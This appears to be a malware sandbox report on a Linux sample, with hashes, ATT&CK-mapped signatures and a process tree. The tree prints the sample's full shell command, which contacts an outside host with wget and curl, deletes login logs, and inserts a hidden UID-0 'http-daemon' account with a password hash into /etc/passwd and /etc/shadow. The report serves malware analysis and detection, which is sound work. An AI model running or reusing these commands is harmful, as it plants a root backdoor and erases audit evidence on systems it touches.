123e6d1138bfd58de1173818d82b504ef928d5a3be7756dd627c594de4aad096

Analysis

max time kernel
0s
max time network
5s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20221111-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
31-12-2022 15:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

123e6d1138bfd58de1173818d82b504ef928d5a3be7756dd627c594de4aad096
Size

22KB
MD5

5eeaf0c650a23f51012fdf4d6ce9e8cb
SHA1

e7513033257428aa0f2018b5920a68e1cd492a8d
SHA256

123e6d1138bfd58de1173818d82b504ef928d5a3be7756dd627c594de4aad096
SHA512

e6a8dbb741995533d91e58df8a34a936e1140d95a5cdbee83d58072d2aa5dd98405823c8182aebd6dfec82fbcef520f68265804239a7eeccd46979f9e30f0f91
SSDEEP

384:awi1TzSNCnw5q8I1oJKhA0vk6D0qTAK32:aT1qNCnwfI1ok26Ddsu2

Score

9^/10

Malware Config

Signatures

Deletes system logs 1 TTPs 3 IoCs

Indicator Removal on Host

T1070

description	ioc	Process
/var/log/lastlog	/var/log/lastlog	rm
/var/log/wtmp	/var/log/wtmp	rm
/var/log/btmp	/var/log/btmp	rm

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
/proc/filesystems	/proc/filesystems	sed
/proc/filesystems	/proc/filesystems	sed

/tmp/123e6d1138bfd58de1173818d82b504ef928d5a3be7756dd627c594de4aad096
/tmp/123e6d1138bfd58de1173818d82b504ef928d5a3be7756dd627c594de4aad096
1⤵
PID:587
- /bin/sh
  sh -c "wget -q --no-check-certificate --delete-after https://yip.su/1K6867 > /dev/null 2>&1 ; curl https://yip.su/1K6867 > /dev/null 2>&1 ; rm -rf /var/log/lastlog /var/log/wtmp /var/log/btmp > /dev/null 2>&1 ; grep http-daemon /etc/passwd > /dev/null 2>&1 || sed -i '2i\\http-daemon:x:0:500::/:/bin/bash' /etc/passwd > /dev/null 2>&1 ; grep http-daemon /etc/shadow > /dev/null 2>&1 || sed -i '2i\\http-daemon:\$6\$TQKbncg/\$NUCjcDUK1a0fj75PVgGQfDQLwoNud8q3AdQ8mvqs3y4AxpI/.Qepjex02/YdwG1fkjDukSqsxqUIXMvp9ju0R/:18326:0:99999:7:::' /etc/shadow > /dev/null 2>&1"
  2⤵
  PID:588
- - /usr/bin/wget
    wget -q --no-check-certificate --delete-after https://yip.su/1K6867
    3⤵
    - Modifies hosts file
    - Writes DNS configuration
    PID:589
- - /bin/rm
    rm -rf /var/log/lastlog /var/log/wtmp /var/log/btmp
    3⤵
    - Deletes system logs
    PID:594
- - /bin/grep
    grep http-daemon /etc/passwd
    3⤵
    PID:595
- - /bin/sed
    sed -i "2i\\http-daemon:x:0:500::/:/bin/bash" /etc/passwd
    3⤵
    - Reads runtime system information
    PID:596
- - /bin/grep
    grep http-daemon /etc/shadow
    3⤵
    PID:597
- - /bin/sed
    sed -i "2i\\http-daemon:\$6\$TQKbncg/\$NUCjcDUK1a0fj75PVgGQfDQLwoNud8q3AdQ8mvqs3y4AxpI/.Qepjex02/YdwG1fkjDukSqsxqUIXMvp9ju0R/:18326:0:99999:7:::" /etc/shadow
    3⤵
    - Reads runtime system information
    PID:598

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads